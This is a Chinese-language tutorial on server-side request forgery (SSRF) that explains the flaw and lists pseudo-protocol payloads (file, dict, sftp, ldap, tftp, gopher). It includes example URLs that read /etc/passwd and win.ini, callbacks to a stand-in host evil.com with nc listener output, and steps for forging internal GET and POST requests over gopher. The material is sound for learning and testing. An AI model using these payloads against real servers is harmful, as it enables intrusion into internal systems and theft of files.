一、SSRF是什么？

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。

一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统）

攻击方式:借助主机A来发起SSRF攻击，通过主机A向主机B发起请求，从而获取主机B的一些信息。

二、SSRF漏洞原理

SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。

三、SSRF中URL的伪协议

当我们发现SSRF漏洞后，首先要做的事情就是测试所有可用的URL伪协议

    file:/// 从文件系统中获取文件内容，如，file:///etc/passwd
    dict:// 字典服务器协议，访问字典资源，如，dict:///ip:6739/info：
    sftp:// SSH文件传输协议或安全文件传输协议
    ldap:// 轻量级目录访问协议
    tftp:// 简单文件传输协议
    gopher:// 分布式文档传递服务，可使用gopherus生成payload

1、file

这种URL Schema可以尝试从文件系统中获取文件：

    http://example.com/ssrf.php?url=file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini

如果该服务器阻止对外部站点发送HTTP请求，或启用了白名单防护机制，只需使用如下所示的URL Schema就可以绕过这些限制：

2、dict

这种URL Scheme能够引用允许通过DICT协议使用的定义或单词列表：

    http://example.com/ssrf.php?dict://evil.com:1337/
    evil.com:$ nc -lvp 1337
    Connection from [192.168.0.12] port 1337[tcp/*]
    accepted (family 2, sport 31126)CLIENT libcurl 7.40.0

3、sftp

在这里，Sftp代表SSH文件传输协议（SSH File Transfer Protocol），或安全文件传输协议（Secure File Transfer Protocol），这是一种与SSH打包在一起的单独协议，它运行在安全连接上，并以类似的方式进行工作。

    http://example.com/ssrf.php?url=sftp://evil.com:1337/
    evil.com:$ nc -lvp 1337
    Connection from [192.168.0.12] port 1337[tcp/*]
    accepted (family 2, sport 37146)SSH-2.0-libssh2_1.4.2

4、ldap://或ldaps:// 或ldapi://

LDAP代表轻量级目录访问协议。它是IP网络上的一种用于管理和访问分布式目录信息服务的应用程序协议。

    http://example.com/ssrf.php?url=ldap://localhost:1337/%0astats%0aquithttp://example.com/ssrf.php?url=ldaps://localhost:1337/%0astats%0aquithttp://example.com/ssrf.php?url=ldapi://localhost:1337/%0astats%0aquit

5、tftp://

TFTP（Trivial File Transfer Protocol,简单文件传输协议）是一种简单的基于lockstep机制的文件传输协议，它允许客户端从远程主机获取文件或将文件上传至远程主机。

    http://example.com/ssrf.php?url=tftp://evil.com:1337/TESTUDPPACKET
    evil.com:# nc -lvup 1337
    Listening on [0.0.0.0] (family 0, port1337)TESTUDPPACKEToctettsize0blksize512timeout3

6、gopher://

Gopher是一种分布式文档传递服务。利用该服务，用户可以无缝地浏览、搜索和检索驻留在不同位置的信息。

利用范围较广:【GET提交】【POST提交】【redis】【Fastcgi】【sql】

基本格式:URL:gopher://<host>:<port>/<gopher-path>

web也需要加端口号80  gopher协议默认端口为 70

gopher伪协议传输的数据第一位会被吃掉所以在传输前最好加一个‘-’防止传输的数据数据有误

用gopher伪协议发送get请求

需要保留头部信息:
1、目标IP地址:Host: 172.250.250.4
2、路径:GET/name.php?name=benben HTTP/1.1
gopher://172.250.250.4:80/_GET%20/name.php%3fname=benben%20HTTP/1.1%0d%0AHost:%20172.250.250.4%0d%0A

注意点

1、问号(?)需要转码为URL编码，也就是%3f2、回车换行要变为%0d%0a,但如果直接用工具转，可能只会有%0a
3、在HTTP包的最后要加%0d%0a，代表消息结束(具体可研究HTTP包结束)
4、URL编码改为大写,冒号注意英文冒号
5、如果使用BP发包需要进行两次url编码
6、GET提交最后需要增加一个换行符

用gopher伪协议发送post请求

需要保留头部信息:
1、POST
2、 Host:
3、Content-Type:
4、Content-Length:

eg：

使用工具将以下内容进行两次URL编码
POST /name.php HTTP/1.1

Host: 172.250.250.4

Content-Type:application/x-www-form-urlencoded（指示请求或响应中所包含的实体主体的媒体类型）

Content-Length:15（下面字符串的长度）

name=benben2222

gopher://172.250.250.4:80/
gopher格式不变